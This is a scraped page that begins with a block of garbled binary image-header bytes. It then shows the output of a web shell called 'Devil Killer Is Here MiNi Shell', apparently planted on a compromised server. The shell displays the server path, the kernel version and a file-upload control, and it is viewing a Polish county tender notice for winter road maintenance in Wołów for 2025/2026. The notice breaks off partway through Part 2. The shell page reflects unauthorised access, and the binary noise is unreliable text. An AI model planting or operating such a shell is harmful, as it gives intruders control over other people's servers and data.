JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251016/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251016/0047962801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie zimowym 2025/2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Wołowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934800</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Piastowski 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wołów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiatwolowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatwolowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie zimowym 2025/2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7d53b8ea-0e39-4290-b989-3b1444db8ed9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00479628</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00045579/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie zimowym 2025/2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiatwolowski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/powiatwolowski<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>W sytuacjach awaryjnych z wyjątkiem składania ofert zamawiający dopuszcza komunikację elektroniczną poprzez e-mail: zamowienia@powiatwolowski.pl<br/>Szczegóły zawarte w Rozdz. 14 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4)	włączona obsługa JavaScript,<br/>5)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6)	szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1)	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie za- mieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem: https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>Szczegóły zawarte w Rozdz. 14 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:1)Administratorem Pani/Pana danych osobowych jest Powiat Wołowski, z siedzibą w: 56 – 100 Wołów, Pl. Piastowski 2, tel.: +48 71 380 59 01.2)Informujemy, że wyznaczyliśmy Inspektora Ochrony Danych. Może Pani/Pan skontaktować się z nim poprzez wiadomość wysłaną na adres e-mail: iod@powiatwolowski.pl lub listownie na adres: Starostwo Powiatowe w Wołowie, 56 – 100 Wołów, Pl. Piastowski 2.3)Pani/Pana dane osobowe przetwarzane będą na podstawie:-art. 6 ust. 1 lit. c RODO oraz ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych, dalej „ustawa Pzp’’, w celu związanym z postępowaniem o udzielenie zamówienia publicznego.W przypadku złożenia najkorzystniejszej oferty Administrator będzie przetwarzał dane osobowe w celu zawarcia i realizacji umowy (na podstawie art. 6 ust. 1 lit. b RODO), jak również do dochodzenia potencjalnych roszczeń związanych z zawartą umową (na podstawie art. 6 ust. 1 lit. f RODO) oraz w celach archiwalnych (na podstawie art. 6 ust. 1 lit. c RODO); dodatkowo, przepisy prawa wymagają od administratora danych przetwarzania danych dla celów podatkowych i rachunkowych.4)Odbiorcami Pani/Pana danych osobowych będą:-podmioty upoważnione na podstawie przepisów prawa,-osoby lub podmioty, którym udostępniona zostanie dokumentacja niniejszego postępowania zgodnie z art. 18 oraz art. 74 ustawy Pzp,-podmioty wykonujące zadania zlecone przez Administratora, w szczególności: dostawcy usług IT, podmioty prowadzące działalność pocztową lub kurierską, podmioty świadczące usługi prawnicze, przy czym takie podmioty będą przetwarzać dane na podstawie umowy i wyłącznie zgodnie z jego poleceniami.5)Okres przechowywania danych:a)w odniesieniu do podmiotów, których oferta nie została wybrana - przez okres 5 lat od dnia za- kończenia postępowania o udzielenie zamówienia publicznego,b)w przypadku zawarcia umowy - do momentu obowiązywania umowy zawartej w wyniku przeprowadzonego postępowania, a także po jej zakończeniu, tj.:<br/>-przez okres 5 lat od dnia zakończenia niniejszego postępowania,<br/>-dane zawarte na umowie – do czasu przedawnienia lub wygaśnięcia na innej podstawie ewentualnych roszczeń wynikających z umowy,<br/>-w celach wynikających z przepisów prawa, w szczególności obowiązku przechowywania dokumentów księgowych, wystawienia faktur itp.,6)Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.7)Pani/Pana dane osobowe nie będą przekazywane do państw trzecich, nie będą przetwarzane w sposób zautomatyzowany, nie będą poddawane profilowaniu.8)Posiada Pani/Pan:a)na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,b)na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych1,c)na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO2,d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;9)Nie przysługuje Pani/Panu:a)w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż pod- stawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIT.272.24.2025.ZDP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Nazwa zamówienia: Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie zimowym 2025/2026.<br/>2.	Przedmiotem zamówienia jest świadczenie usług związanych z zimowym utrzymaniem dróg w celu złagodzenia skutków zimy, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego, wywołanymi takimi czynnikami atmosferycznymi jak śliskość zimowa i opady śniegu i polegać będzie na utrzymaniu pasa drogowego zgodnie z przyjętymi standardami zimowego utrzymania dróg oraz zasadami odśnieżania i usuwania śliskości zimowej na drogach powiatowych i wojewódzkich na terenie powiatu wołowskiego – na jezdni głównej oraz obiektach towarzyszących tj. przystankach komunikacji zbiorowej, zatokach postojowych, placach, parkingach pasach dla rowerów, skrzyżowaniach z drogami o nawierzchni bitumicznej.<br/><br/>3.1.	Zadanie nr 1 – Świadczenie usług przy zimowym utrzymaniu dróg wojewódzkich na terenie powiatu wołowskiego<br/>1)	Do realizacji zamówienia Wykonawca zapewni: <br/>a)	piaskarki o ładowności min. 8 ton (pojemność zasobnika na mieszankę piaskowo-solną) – 2 szt.<br/>b)	pługi minimum średnie sterowane hydraulicznie z kabiny kierowcy z dociskiem oraz możliwością skrętu – 2 szt. <br/>c)	nośniki:<br/>-samochód ciężarowy z napędem na dwie osie – 2 szt.<br/>-lub ciągnik rolniczy z napędem na dwie osie o mocy 115 KM i osiągającym prędkość min. 40 km/godz. – 2 szt.<br/><br/>2)	Przewidywane ilości usług (akcja czynna) na sezon zimowy 2025/2026:<br/>a)	długość dróg: 91,287 km<br/>b)	dla pługopiaskarki : 125 godzin pracy wraz z miesięczną gotowością<br/>c)	wykonanie 25% mieszanki uszorstniającej (piaskowo-solnej) w ilości 330 Mg i rozliczanej wg faktycznego zużycia <br/>Podane powyżej ilości czasu pracy i ton mieszanki są jedynie szacunkowe i mogą ulec zmianie w zależności od warunków atmosferycznych i potrzeb na drogach.<br/><br/>3)	Za utrzymanie gotowości (akcji biernej) do wykonania zamówienia dla zadania nr 1 w sezonie zimowym Zamawiający zapłaci Wykonawcy zryczałtowaną stawkę w wysokości: 2 500,00 zł netto miesięcznie.<br/><br/>Zakres i wymagania dotyczące wykonania przedmiotu zamówienia określają dodatkowo: <br/>1)	Wykaz dróg i Standardy ZUD – załącznik nr 6 do SWZ<br/>2)	Projekt umowy – załącznik nr 7 do SWZ<br/>3)	Szczegółowe Specyfikacje Techniczne – załącznik nr 8 do SWZ<br/><br/>Szczegóły zawarte w Rozdz. 4 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się poniższymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>1)	ZADANIA NR 1 (świadczenie usług przy ZUD)<br/><br/>l.p.	Kryterium	Waga – udział w ocenie<br/>1.	Cena oferty brutto (C)	60% = 60 pkt<br/>2.	Czas podstawienia sprzętu (T)	40% = 40 pkt<br/><br/>Kryterium „CENA” (C)<br/>Kryterium to będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia (zadania 1-4) – suma cen składowych wpisanych przez Wykonawcę w formularzu oferty, na podstawie formularza cenowego. <br/>Przyjmuje się, że najwyższą ilość punktów, tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach na wykonanie zamówienia objętego zamówieniem (zadania). <br/><br/>Ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/><br/>Cena najniższa brutto<br/>C = ----------------------------------------------- x 60 pkt<br/>Cena oferty ocenianej brutto<br/> <br/>	Uzyskana liczba punktów w ramach kryterium „cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/>Kryterium „CZAS PODSTAWIENIA SPRZĘTU” (T)<br/>Kryterium to oznacza czas podstawienia sprzętu liczony od chwili powiadomienia Wykonawcy przez Dyżurnego ZUD z ramienia Zamawiającego do momentu stawienia się na bazie Wykonawcy jednostki sprzętowo-transportowej, sprawnej technicznie, zatankowanej i załadowanej mieszanką uszorstniającą. <br/>W ww. kryterium można uzyskać maksymalnie 40 punktów.<br/><br/>Maksymalny czas podstawienia sprzętu od momentu wezwania przez Zamawiającego wynosi – 2 godziny.<br/><br/>Oferty w niniejszym kryterium będą ocenione następująco: <br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 2 godz. otrzymają 0 pkt.<br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 1,5 godz. otrzymają 20 pkt <br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 1 godz. otrzymają 40 pkt<br/> <br/>W przypadku podania w ofercie okresu pośredniego (innego niż okres 1, 1,5, 2, godziny), w ocenie ofert (kryteria oceny) będzie decydować wartość mniejsza spełniająca granicę danego poziomu. <br/>Dla oferty, w której wykonawca nie wskazał czasu podstawienia sprzętu, Zamawiający przyjmie najdłuższy przewidziany czas tj. powyżej 2 godz. <br/>Dla oferty, w której wykonawca wskazał czas podstawienia sprzętu krótszy od 1 godz., Zamawiający przyjmie do oceny ofert punktację za najkrótszy przewidziany czas tj. 1 godz. <br/> <br/>Suma punktów uzyskanych w kryteriach „cena” oraz „czas reakcji” stanowić będzie o ogólnej sumie punktów uzyskanych przez ofertę.<br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą łączną ilość punktów wg powyższych zasad. Ocenie podlegać będą wyłącznie oferty nie podlegające odrzuceniu.<br/>Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i czasu reakcji Zmawiający spośród tych ofert wybierze ofertę z najniższą ceną jednostkową za środki sprzętowo-transportowe do odśnieżania i usuwania śliskości zimowej (pługo-piaskarka), a jeżeli zostaną złożone oferty o takiej samej cenie, Zamawiający wezwie wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia sprzętu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Nazwa zamówienia: Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie zimowym 2025/2026.<br/>2.	Przedmiotem zamówienia jest świadczenie usług związanych z zimowym utrzymaniem dróg w celu złagodzenia skutków zimy, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego, wywołanymi takimi czynnikami atmosferycznymi jak śliskość zimowa i opady śniegu i polegać będzie na utrzymaniu pasa drogowego zgodnie z przyjętymi standardami zimowego utrzymania dróg oraz zasadami odśnieżania i usuwania śliskości zimowej na drogach powiatowych i wojewódzkich na terenie powiatu wołowskiego – na jezdni głównej oraz obiektach towarzyszących tj. przystankach komunikacji zbiorowej, zatokach postojowych, placach, parkingach pasach dla rowerów, skrzyżowaniach z drogami o nawierzchni bitumicznej.<br/><br/>3.2.	Zadanie nr 2 – Świadczenie usług przy zimowym utrzymaniu dróg powiatowych na terenie gminy Wińsko<br/><br/>1)	Do realizacji zamówienia Wykonawca zapewni: <br/>a)	piaskarki o ładowności min. 8 ton (pojemność zasobnika na mieszankę piaskowo-solną) – 2 szt.<br/>b)	pługi minimum średnie sterowane hydraulicznie z kabiny kierowcy z dociskiem oraz możliwością skrętu – 2 szt. <br/>c)	nośniki:<br/>- samochód o ładowności min. 16 ton z napędem na dwie osie – 2 szt.<br/>- lub ciągnik rolniczy z napędem na dwie osie o mocy 115 KM i osiągającym prędkość min. 40 km/godz. – 2 szt.<br/><br/>2)	Przewidywane ilości usług (akcja czynna) na sezon zimowy 2025/2026:<br/>a)	długość dróg: 80,727 km<br/>b)	dla pługopiaskarki : 60 godzin pracy wraz z miesięczną gotowością<br/>c)	wykonanie 25% mieszanki uszorstniającej (piaskowo-solnej) w ilości 110 Mg i rozliczanej wg faktycznego zużycia <br/>Podane powyżej ilości czasu pracy i ton mieszanki są jedynie szacunkowe i mogą ulec zmianie w zależności od warunków atmosferycznych i potrzeb na drogach.<br/><br/>3)	Za 